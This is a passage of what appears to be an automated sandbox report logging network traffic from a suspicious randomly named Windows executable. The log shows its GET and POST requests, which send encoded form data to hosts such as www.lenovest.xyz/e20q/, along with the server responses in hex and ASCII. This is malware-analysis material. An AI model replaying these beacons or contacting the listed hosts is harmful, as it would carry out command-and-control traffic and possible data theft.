Jun 5, 2024 18:28:05.763447046 CEST	1236	IN	Data Raw: 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f Data Ascii: t-Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW=; Path=/3h10; Max-A
Jun 5, 2024 18:28:05.763458014 CEST	794	IN	Data Raw: 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f Data Ascii: kie: LADI_CAMP_PAGE_VIEW=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/3h10; Max-Age=0Set-Cook
Jun 5, 2024 18:28:05.763745070 CEST	1236	IN	Data Raw: 31 34 30 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 3c db 8e db 48 76 bf 52 d6 62 a6 25 b8 a8 96 ba 5b 7d 91 5a 3d f1 38 4e 76 80 c1 8e 31 e3 d9 ec c2 70 8c 12 59 92 38 4d 91 34 49 f5 c5 da 7e 08 f2 98 87 60 9f f3 92 c1 60 10 20 40 80 20 c8 d3 fa Data Ascii: 140c<HvRb%[}Z=8Nv1pY8M4I~`` @ SU$d-YS^.</~'Tsv#E1Oo_u:;Mg](${1n=e[O?Elx>xi;-u/67E$H
Jun 5, 2024 18:28:05.763753891 CEST	212	IN	Data Raw: 1c ee ec 8c d2 47 01 4b 88 7d a5 d8 6a 43 4c c2 c2 98 0f d3 07 25 41 0b f4 c7 16 22 95 44 69 42 3c 0c 41 12 8b d8 12 74 61 91 c5 9c ef 96 b1 84 2e 05 50 53 15 d4 55 28 b9 1a 6b 6f ba 01 68 c9 14 22 27 6b ee 3a 0e f7 57 e9 fb 50 be df 08 47 69 25 Data Ascii: GK}jCL%A"DiB<Ata.PSU(koh"'k:WPGi%83W%)^\|9Vkn~WaO+P"SHmM:{\|[KuXM}j;h6aRz;FEP:uHqp-
Jun 5, 2024 18:28:05.763792992 CEST	1236	IN	Data Raw: 94 76 10 0d 7f 31 9d 4e 47 25 92 91 36 31 ce 40 0c d3 1f 0c 70 1c 45 6b 24 46 eb 8d 94 bd b3 65 12 a4 6a 12 01 19 cb 18 b8 10 5e ad 4b 25 99 f7 57 15 9c 04 ce 87 74 af 4f 0f 00 eb de a0 33 52 b8 22 63 53 f7 d2 df 03 1a fb 80 99 f4 29 97 92 0b 87 Data Ascii: v1NG%61@pEk$Fej^K%WtO3R"cS)9XbQc"!fI!p9h'+n\|-6ud0vQ4PkU- E+AC?I4H6OZ~}U\|qr.!lpBNr>/)
Jun 5, 2024 18:28:05.763860941 CEST	1236	IN	Data Raw: 68 5c d9 4f a5 17 9d b4 72 96 24 cc 9e a3 ca 98 6a e5 05 bf ac 26 65 8f b8 b4 d3 78 ce 58 47 05 9e 78 af 8f 7f f9 7c fc 7e f1 20 78 2b 6d 55 80 65 d9 dc f3 ca f7 c0 16 60 ae 5e 05 64 c9 de ea 50 bd 6f 11 d4 9f c2 a8 09 52 df 2c ae 41 76 1d d7 97 Data Ascii: h\Or$j&exXGx\|~ x+mUe`^dPoR,Av:8qCK%$r@kbt]S^ZjYJJa%xG5aSF>&C=\|u]I<$X^y !z^??_<Wyju%NZVaV\`T,4M$*\|R
Jun 5, 2024 18:28:05.763864040 CEST	1236	IN	Data Raw: cc a5 d1 3d 6c 0e a4 25 31 a4 c0 3f 19 17 bb 8b d9 4a bb 01 58 d8 36 e8 ef e7 89 42 d2 e4 11 d9 ea 62 b0 9f 3b 57 f1 5c 1f 89 9a 46 17 49 d9 f4 f4 21 1a b8 3e de 33 2e 67 fa d0 4f b7 8f 7a bd 5c c7 31 05 c5 70 02 2b c9 73 0b d3 17 d6 a5 04 b9 9c Data Ascii: =l%1?JX6Bb;W\FI!>3.gOz\1p+sEtNT5AS5@cUG1/,n=V$F=}^i,`XA#jfUN0S9OVX)lU2W~4c{!dv*:9
Jun 5, 2024 18:28:05.763870955 CEST	4	IN	Data Raw: 0d 0a 0d 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49726	13.228.81.39	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:28:07.274287939 CEST	460	OUT	GET /3h10/?9d=9mZLXJL8GvO5ODxbtOpJ+rtZ6f1lqm3xC+OCFBImS8kNzrmbjyRfioF27F6qemRmHzSdXM7CT4wlEWpleIDtGTZ1FuoRBIGpq98dFU7vfHeXH9gl+ce92Dv1nZMBIpBNzTq2jDHLjtUw&G0a=VFN0vBc0ol1ljnb0 HTTP/1.1 Host: www.againbeautywhiteskin.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Jun 5, 2024 18:28:08.337946892 CEST	1236	IN	HTTP/1.1 200 OK Server: openresty Date: Wed, 05 Jun 2024 16:28:08 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0 Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p Data Raw: Data Ascii:
Jun 5, 2024 18:28:08.337981939 CEST	1236	IN	Data Raw: 70 75 70 78 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 2a 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 73 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 67 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f Data Ascii: pupx.ladi.me https://.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://.ladicdn.com https://www.facebook.com https://*.facebook.comSet-Cookie: LADI_DNS_CHECK="2024-06-05 16:28:08.148780089 +0000 UTC m=+2016
Jun 5, 2024 18:28:08.338010073 CEST	424	IN	Data Raw: 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f Data Ascii: t-Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW=; Path=/3h10; Max-A
Jun 5, 2024 18:28:08.338021040 CEST	1236	IN	Data Raw: 42 4d 49 54 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 43 4f 4e 46 49 47 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d Data Ascii: BMIT_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_CONFIG=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_END_DATE=; Path=/3h10; Max-Age=0Set-Cookie: LADI_FUNNEL_NEXT_URL=; Path=/3h10; Max-Age=0Set-Cookie: LADI_FUNNEL_PREV_URL=; Path=
Jun 5, 2024 18:28:08.338032007 CEST	1236	IN	Data Raw: 31 30 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 42 45 48 41 56 49 4f 52 5f 46 4f 52 4d 53 55 42 4d 49 54 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 33 68 31 30 3b 20 4d 61 78 2d 41 67 Data Ascii: 10; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT_PATH=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_CONFIG=; Path=/3h10; Max-Age=0Set-Cookie: LADI_CAMP_END_DATE=; Path=/3h10; Max-Age=0Statuscode: 502Strict-Transport-Security: ma
Jun 5, 2024 18:28:08.338042974 CEST	424	IN	Data Raw: 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 20 2f Data Ascii: a property="og:title" content="404" /><meta property="og:type" content="website" /><meta property="og:description" content="404" /><meta name="format-detection" content="telephone=no" /><link rel="dns-prefetch"><link rel="preconnect" href="htt
Jun 5, 2024 18:28:08.338056087 CEST	1236	IN	Data Raw: 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 61 2e 6c 61 64 69 70 61 67 65 2e 63 6f 6d 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 Data Ascii: ink rel="preconnect" href="https://la.ladipage.com/" crossorigin><link rel="preload" href="https://fonts.googleapis.com/css?family=Open Sans:bold,regular&display=swap" as="style" onload="this.onload = null;this.rel = 'stylesheet';"><style id="
Jun 5, 2024 18:28:08.338069916 CEST	1236	IN	Data Raw: 74 3a 6e 6f 6e 65 3b 2d 6d 6f 7a 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 6e 6f 6e 65 3b 2d 6f 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 Data Ascii: t:none;-moz-text-size-adjust:none;-o-text-size-adjust:none;-webkit-text-size-adjust:none}.overflow-hidden{overflow:hidden}.ladi-transition{transition:all 150ms linear 0s}.ladipage-message{position:fixed;width:100%;height:100%;top:0;left:0;z-in
Jun 5, 2024 18:28:08.338080883 CEST	424	IN	Data Raw: 74 3a 36 30 30 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 6c 61 64 69 2d 77 72 61 70 65 72 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 6c 61 64 69 2d 73 65 63 Data Ascii: t:600;cursor:pointer}.ladi-wraper{width:100%;height:100%;overflow:hidden}.ladi-section{margin:0 auto;position:relative}.ladi-section .ladi-section-arrow-down{position:absolute;width:36px;height:30px;bottom:0;right:0;left:0;margin:auto;backgrou
Jun 5, 2024 18:28:08.338093996 CEST	1236	IN	Data Raw: 6c 69 6e 65 61 72 20 30 73 7d 2e 6c 61 64 69 2d 73 65 63 74 69 6f 6e 20 2e 6c 61 64 69 2d 73 65 63 74 69 6f 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 63 6f 6e 74 65 6e 74 3a 27 27 3b 64 69 73 70 Data Ascii: linear 0s}.ladi-section .ladi-section-background{position:absolute;content:'';display:block;top:0;left:0;height:100%;width:100%;pointer-events:none}.ladi-container{position:relative;margin:0 auto;height:100%}.ladi-element{position:absolute}.la
Jun 5, 2024 18:28:08.342984915 CEST	1236	IN	Data Raw: 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 74 72 61 6e 73 66 6f 72 6d 20 33 35 30 6d 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 2d 77 65 62 6b 69 74 2d 62 Data Ascii: 0%;position:relative;display:none;transition:transform 350ms ease-in-out;-webkit-backface-visibility:hidden;backface-visibility:hidden;-webkit-perspective:1000px;perspective:1000px}.ladi-gallery .ladi-gallery-view>.ladi-gallery-view-item.next,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49727	162.0.213.94	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:28:21.911345005 CEST	702	OUT	POST /e20q/ HTTP/1.1 Host: www.lenovest.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 215 Origin: http://www.lenovest.xyz Referer: http://www.lenovest.xyz/e20q/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 62 4e 44 43 75 67 58 31 6e 58 47 4c 53 5a 75 75 4c 47 69 49 65 68 67 2f 39 57 73 30 7a 56 33 46 2f 4f 6b 49 62 7a 51 68 54 6d 34 42 61 38 6b 4f 63 72 72 61 56 42 6d 72 30 6e 47 70 49 5a 4f 38 4d 66 48 54 5a 55 6a 32 33 59 31 33 65 76 4a 72 64 71 57 54 61 34 72 64 56 6d 70 49 4e 64 61 46 57 4c 69 76 52 46 4b 49 44 77 37 4d 6c 49 57 43 51 6a 6b 66 34 43 53 5a 61 6d 63 62 65 61 70 52 6c 39 30 4a 6a 42 36 59 52 67 68 64 35 4e 6d 75 77 38 64 42 36 43 75 46 48 38 48 43 53 68 58 37 50 34 6d 46 48 69 44 71 70 42 48 42 35 46 66 2f 7a 39 79 57 56 6c 77 30 61 48 32 75 50 31 6f 57 68 31 47 6a 51 74 6b 66 59 69 4c 30 71 31 33 4d 66 51 3d 3d Data Ascii: 9d=bNDCugX1nXGLSZuuLGiIehg/9Ws0zV3F/OkIbzQhTm4Ba8kOcrraVBmr0nGpIZO8MfHTZUj23Y13evJrdqWTa4rdVmpINdaFWLivRFKIDw7MlIWCQjkf4CSZamcbeapRl90JjB6YRghd5Nmuw8dB6CuFH8HCShX7P4mFHiDqpBHB5Ff/z9yWVlw0aH2uP1oWh1GjQtkfYiL0q13MfQ==
Jun 5, 2024 18:28:22.609879017 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 16:28:22 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Jun 5, 2024 18:28:22.609950066 CEST	1236	IN	Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
Jun 5, 2024 18:28:22.609998941 CEST	1236	IN	Data Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
Jun 5, 2024 18:28:22.610032082 CEST	1236	IN	Data Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
Jun 5, 2024 18:28:22.610064983 CEST	1236	IN	Data Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32 Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
Jun 5, 2024 18:28:22.610097885 CEST	1236	IN	Data Raw: 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c Data Ascii: 51,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533" d=
Jun 5, 2024 18:28:22.610148907 CEST	1236	IN	Data Raw: 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 Data Ascii: ke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45
Jun 5, 2024 18:28:22.610181093 CEST	1236	IN	Data Raw: 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 Data Ascii: ,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-w
Jun 5, 2024 18:28:22.610213995 CEST	1236	IN	Data Raw: 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 Data Ascii: 1;" /> <path id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
Jun 5, 2024 18:28:22.610249996 CEST	460	IN	Data Raw: 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 Data Ascii: ll-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567"
Jun 5, 2024 18:28:22.615250111 CEST	1236	IN	Data Raw: 32 2c 30 2e 31 33 30 31 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f Data Ascii: 2,0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49728	162.0.213.94	80	4300	C:\Program Files (x86)\jdRyKWmwNGLqUAxzbgMyHhSVQEBNjCyVpYAOhUIcfzFG\hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 18:28:24.440782070 CEST	722	OUT	POST /e20q/ HTTP/1.1 Host: www.lenovest.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 235 Origin: http://www.lenovest.xyz Referer: http://www.lenovest.xyz/e20q/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 39 64 3d 62 4e 44 43 75 67 58 31 6e 58 47 4c 44 4b 32 75 4d 6c 61 49 5a 42 67 38 34 57 73 30 36 31 33 42 2f 4f 34 49 62 32 39 38 53 51 41 42 62 65 38 4f 4e 66 33 61 59 68 6d 72 37 48 47 73 48 35 4f 4a 4d 65 37 68 5a 56 50 32 33 59 68 33 65 72 4e 72 63 5a 76 46 49 34 72 6c 61 47 70 4b 53 4e 61 46 57 4c 69 76 52 42 69 79 44 77 6a 4d 69 34 6d 43 51 41 38 51 37 43 53 47 64 6d 63 62 61 61 70 4e 6c 39 30 33 6a 41 6d 69 52 69 70 64 35 4a 75 75 77 74 63 58 30 43 75 48 44 38 47 33 65 42 44 32 43 6f 33 6e 66 44 6a 46 76 47 54 53 34 7a 43 64 70 66 2b 36 4c 30 49 50 65 46 53 59 59 54 31 6a 6a 30 43 37 64 50 51 2b 48 56 75 65 6e 6e 57 49 4a 76 56 56 6d 6c 76 37 42 6b 76 6f 45 5a 64 30 79 4c 66 49 4f 6f 67 3d Data Ascii: 9d=bNDCugX1nXGLDK2uMlaIZBg84Ws0613B/O4Ib298SQABbe8ONf3aYhmr7HGsH5OJMe7hZVP23Yh3erNrcZvFI4rlaGpKSNaFWLivRBiyDwjMi4mCQA8Q7CSGdmcbaapNl903jAmiRipd5JuuwtcX0CuHD8G3eBD2Co3nfDjFvGTS4zCdpf+6L0IPeFSYYT1jj0C7dPQ+HVuennWIJvVVmlv7BkvoEZd0yLfIOog=
Jun 5, 2024 18:28:25.542156935 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 16:28:25 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 